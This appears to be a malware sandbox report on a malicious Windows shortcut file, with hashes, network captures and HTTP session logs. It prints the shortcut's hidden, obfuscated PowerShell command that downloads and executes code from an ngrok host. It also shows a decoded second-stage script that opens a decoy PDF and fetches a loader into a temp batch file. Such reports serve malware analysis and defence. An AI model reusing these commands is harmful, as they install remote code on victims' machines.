SHA256:	cafffe9031f22c7bc030a5d9876112308f4aad44d4547f1801db261fcbb4c404
SHA512:	481a58989fda13cfd54585da8ac863103dc99962bb12ca03fb5f31996b42acc17f89db44bad30f4ea26737a0d8507c4c5a436b41ab1a476fec323c580920908e
SSDEEP:	48:8GIgax4PsU/rIWXT2qrGGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2rIWXCqSdl2uWvZg5Y
TLSH:	C451AC252BD91725F3F34E364D77B2518E7AB956AD268F2E404042480C62B19DCB5F2B
File Content Preview:	L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......

General
Relative Path:	..\..\..\..\Windows\System32\cmd.exe
Command Line Argument:	/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aa7765 curl ; sal av91c3 iEx ; av91c3(aa7765 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/7430a49b4ec2f1c77488485c5e23d0dd -UseBasicParsing)
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 13:44:16.979274988 CET	54499	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:17.120855093 CET	53	54499	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:18.057969093 CET	123	123	192.168.2.7	40.81.94.65
Dec 19, 2024 13:44:18.644345999 CET	123	123	40.81.94.65	192.168.2.7
Dec 19, 2024 13:44:20.671539068 CET	56367	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:20.808922052 CET	53	56367	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:23.355544090 CET	58768	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:23.663216114 CET	53	58768	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:30.844125986 CET	52682	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:30.844996929 CET	53858	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:30.912638903 CET	58181	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:30.988059998 CET	53	53858	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:30.988289118 CET	53	52682	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:31.205174923 CET	53	58181	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:33.267200947 CET	55082	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:33.267555952 CET	60715	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:34.027295113 CET	51913	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:34.027431965 CET	50048	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:34.504244089 CET	51348	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:34.504391909 CET	57910	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:34.641338110 CET	53	51348	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:34.642055988 CET	53	57910	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:35.732997894 CET	55073	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:35.733374119 CET	51766	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:35.734167099 CET	65526	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:35.734406948 CET	52094	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:35.870496035 CET	53	51766	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:35.870579958 CET	53	55073	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:35.871186972 CET	53	65526	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:35.876754999 CET	53	52094	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:36.024601936 CET	65292	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:36.024601936 CET	64115	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:36.161406040 CET	53	65292	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:36.161427021 CET	53	64115	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:37.897938013 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:38.201096058 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:38.813389063 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:39.000678062 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.000821114 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.001780033 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.001887083 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.001991987 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:39.002710104 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:39.003722906 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:39.010469913 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:39.127917051 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.321222067 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.321274996 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.321305037 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.321332932 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.321700096 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:39.321772099 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:39.324706078 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.637062073 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:39.682373047 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:40.591523886 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:40.591691971 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:40.906852961 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:40.909889936 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:40.910089016 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:40.910265923 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:42.178734064 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:42.178982019 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:42.579504967 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:42.579684019 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:42.656670094 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:42.656691074 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:42.656757116 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:42.659055948 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:42.895034075 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:42.896620989 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:42.896918058 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:42.897399902 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:43.347362041 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:43.347695112 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:43.665355921 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:43.666224003 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:43.667047977 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:43.672760963 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:44.254825115 CET	65170	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:44:44.551152945 CET	53	65170	1.1.1.1	192.168.2.7
Dec 19, 2024 13:44:48.335617065 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:48.335757017 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:48.651355028 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:48.651468039 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:48.651808977 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:48.651912928 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:49.041719913 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:56.230241060 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:56.230395079 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:44:56.547158957 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:56.550978899 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:56.575076103 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:44:56.578769922 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:02.969387054 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:02.970104933 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:02.971960068 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:03.277031898 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:03.284746885 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:03.286111116 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:03.286155939 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:03.288866997 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:03.886271954 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:04.152059078 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.152074099 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.152087927 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.152105093 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.153255939 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:04.154474974 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:04.156080008 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:04.200607061 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.475246906 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.475333929 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.475646973 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:04.475761890 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.475882053 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.475914955 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.475996971 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:04.790133953 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:04.821888924 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:06.448878050 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:06.449052095 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:06.764776945 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:06.766766071 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:06.767221928 CET	443	49662	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:06.767462015 CET	49662	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:11.493958950 CET	138	138	192.168.2.7	192.168.2.255
Dec 19, 2024 13:45:30.389693022 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:30.703793049 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:30.704575062 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:30.729187012 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:31.093329906 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:31.094470024 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:31.094496012 CET	443	59466	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:31.094893932 CET	59466	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:54.700491905 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:54.700644970 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:54.700989962 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:54.701097965 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:55.713592052 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:55.713686943 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:55.713936090 CET	52678	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:45:55.714061975 CET	62893	53	192.168.2.7	1.1.1.1
Dec 19, 2024 13:45:55.714153051 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:55.714193106 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:55.785701990 CET	443	58314	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:55.786222935 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:55.823014021 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:55.851599932 CET	53	52678	1.1.1.1	192.168.2.7
Dec 19, 2024 13:45:55.851619959 CET	53	62893	1.1.1.1	192.168.2.7
Dec 19, 2024 13:45:56.027802944 CET	443	58314	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:56.027892113 CET	443	58314	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:56.027925014 CET	443	58314	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:56.027955055 CET	443	58314	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:56.027988911 CET	443	58314	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:56.028131008 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:56.028193951 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:56.028232098 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:56.041821003 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:56.100608110 CET	443	58314	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:56.127094984 CET	58314	443	192.168.2.7	172.64.41.3
Dec 19, 2024 13:45:56.342238903 CET	443	58314	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:56.355703115 CET	443	58314	172.64.41.3	192.168.2.7
Dec 19, 2024 13:45:56.382117987 CET	58314	443	192.168.2.7	172.64.41.3

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:18 UTC	223	OUT	GET /api/secure/7430a49b4ec2f1c77488485c5e23d0dd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizza Connection: Keep-Alive
2024-12-19 12:44:20 UTC	321	IN	HTTP/1.1 302 Found Access-Control-Allow-Origin: * Content-Length: 395 Content-Type: text/html; charset=utf-8 Date: Thu, 19 Dec 2024 12:44:20 GMT Location: https://www.dropbox.com/scl/fi/99z3idm9bfqz5ub9eti3w/secure.txt?rlkey=lf4wvvzm9z003npv2dbdqosx1&dl=1 Server: Werkzeug/3.0.3 Python/3.12.8 Connection: close
2024-12-19 12:44:20 UTC	395	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 39 39 7a 33 69 64 6d 39 62 66 71 7a 35 75 62 39 65 74 69 33 77 2f 73 65 63 75 72 65 2e 74 78 74 3f 72 6c 6b 65 79 3d 6c 66 34 77 76 76 7a 6d 39 7a 30 30 33 6e 70 76 32 64 62 64 71 6f 73 78 31 26 61 6d 70 3b Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/99z3idm9bfqz5ub9eti3w/secure.txt?rlkey=lf4wvvzm9z003npv2dbdqosx1&

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:22 UTC	236	OUT	GET /scl/fi/99z3idm9bfqz5ub9eti3w/secure.txt?rlkey=lf4wvvzm9z003npv2dbdqosx1&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com Connection: Keep-Alive
2024-12-19 12:44:23 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; font-src https:// data: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://ucee61083117ba5147b0dbdc957e.dl.dropboxusercontent.com/cd/0/get/CgjWc5xou5HIFAE48gufSBlhHgo8LKDYylDYPmEnGULbt8e5KSCEgEKkQkNZJ03tF6XD-27FO7FTio5PCZSZdeXpsHCKW6fDUXhZoFUWxCtJc_7VshZiSUgJN_WQKQOBJ6F8P-AFRi1z9658m7VZzIiN/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MTA4OTEyMzI5NTQwNjg5OTgxODIxMzE5MDY4NDM3MjQ1OTgwNDM1; Path=/; Expires=Tue, 18 Dec 2029 12:44:22 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=vNT2zzUWSWP10GUhDUlLh35g; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:22 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=vNT2zzUWSWP10GUhDUlLh35g; Path=/; Expires=Fri, 19 Dec 2025 12:44:22 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=mOG2VVdSDQ; Path=/; Expires=Fri, 19 Dec 2025 12:44:22 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:22 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Thu, 19 Dec 2024 12:44:23 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 99802422e1884974904428b9abde1697 Connection: close
2024-12-19 12:44:23 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:25 UTC	370	OUT	GET /cd/0/get/CgjWc5xou5HIFAE48gufSBlhHgo8LKDYylDYPmEnGULbt8e5KSCEgEKkQkNZJ03tF6XD-27FO7FTio5PCZSZdeXpsHCKW6fDUXhZoFUWxCtJc_7VshZiSUgJN_WQKQOBJ6F8P-AFRi1z9658m7VZzIiN/file?dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ucee61083117ba5147b0dbdc957e.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-19 12:44:25 UTC	734	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt Content-Security-Policy: sandbox Etag: 1734493528020099d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 140 X-Webkit-Csp: sandbox Date: Thu, 19 Dec 2024 12:44:25 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 411 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: fb23639e293c4008aa06604585f939c3 Connection: close
2024-12-19 12:44:25 UTC	411	IN	Data Raw: 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 6d 73 65 64 67 65 2e 65 78 65 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 2d 6b 69 6f 73 6b 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 64 67 69 75 72 36 34 76 61 77 6d 64 78 39 61 6c 71 77 36 65 74 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 6b 64 75 68 71 72 6e 70 30 30 72 6a 34 34 72 6a 65 70 70 75 77 33 31 71 6b 26 64 6c 3d 31 22 3b 20 24 52 61 6e 64 6f 6d 46 69 6c 65 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 62 61 74 22 3b 20 49 57 52 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 6c 30 38 30 Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR -Uri "https://www.dropbox.com/scl/fi/l080

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:29 UTC	212	OUT	GET /scl/fi/l080falpmqnxrd0e4zb2u/loader.txt?rlkey=d7n6vctas1qob3kqdiqef7ydc&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com
2024-12-19 12:44:30 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://uc58175d1f0dd02d43497cae0960.dl.dropboxusercontent.com/cd/0/get/CggyE9x9tsooR8bgLLYezdmbtOFNiAhkcWHgTodDG_kvlOz8ZlHICIdjusZj2Lij6qiGT5o_NM2KpCcExTyd9gswV0BojrCyZrr5FQLTD4cJbLGX9gQMBEAEgyEVD4xhEyrOXL1RVovqELTK5EagwvHh/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MjUyNjQ0OTU0OTkzMjA2MTI5NjAzOTQ3NzQzOTE3NzMxNTYwNDIz; Path=/; Expires=Tue, 18 Dec 2029 12:44:30 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=29JeQpc0ylAyESUEqoozoaJw; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:30 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=29JeQpc0ylAyESUEqoozoaJw; Path=/; Expires=Fri, 19 Dec 2025 12:44:30 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=acgB3C092Q; Path=/; Expires=Fri, 19 Dec 2025 12:44:30 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:30 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Thu, 19 Dec 2024 12:44:30 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 8f2757619a15457f942a83cda651a7a6 Connection: close
2024-12-19 12:44:30 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:32 UTC	370	OUT	GET /cd/0/get/CggyE9x9tsooR8bgLLYezdmbtOFNiAhkcWHgTodDG_kvlOz8ZlHICIdjusZj2Lij6qiGT5o_NM2KpCcExTyd9gswV0BojrCyZrr5FQLTD4cJbLGX9gQMBEAEgyEVD4xhEyrOXL1RVovqELTK5EagwvHh/file?dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: uc58175d1f0dd02d43497cae0960.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-19 12:44:34 UTC	734	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt Content-Security-Policy: sandbox Etag: 1734493525663540d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 665 X-Webkit-Csp: sandbox Date: Thu, 19 Dec 2024 12:44:33 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 797 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 766a4d75578d4fbfaa6ed5643c958bcf Connection: close
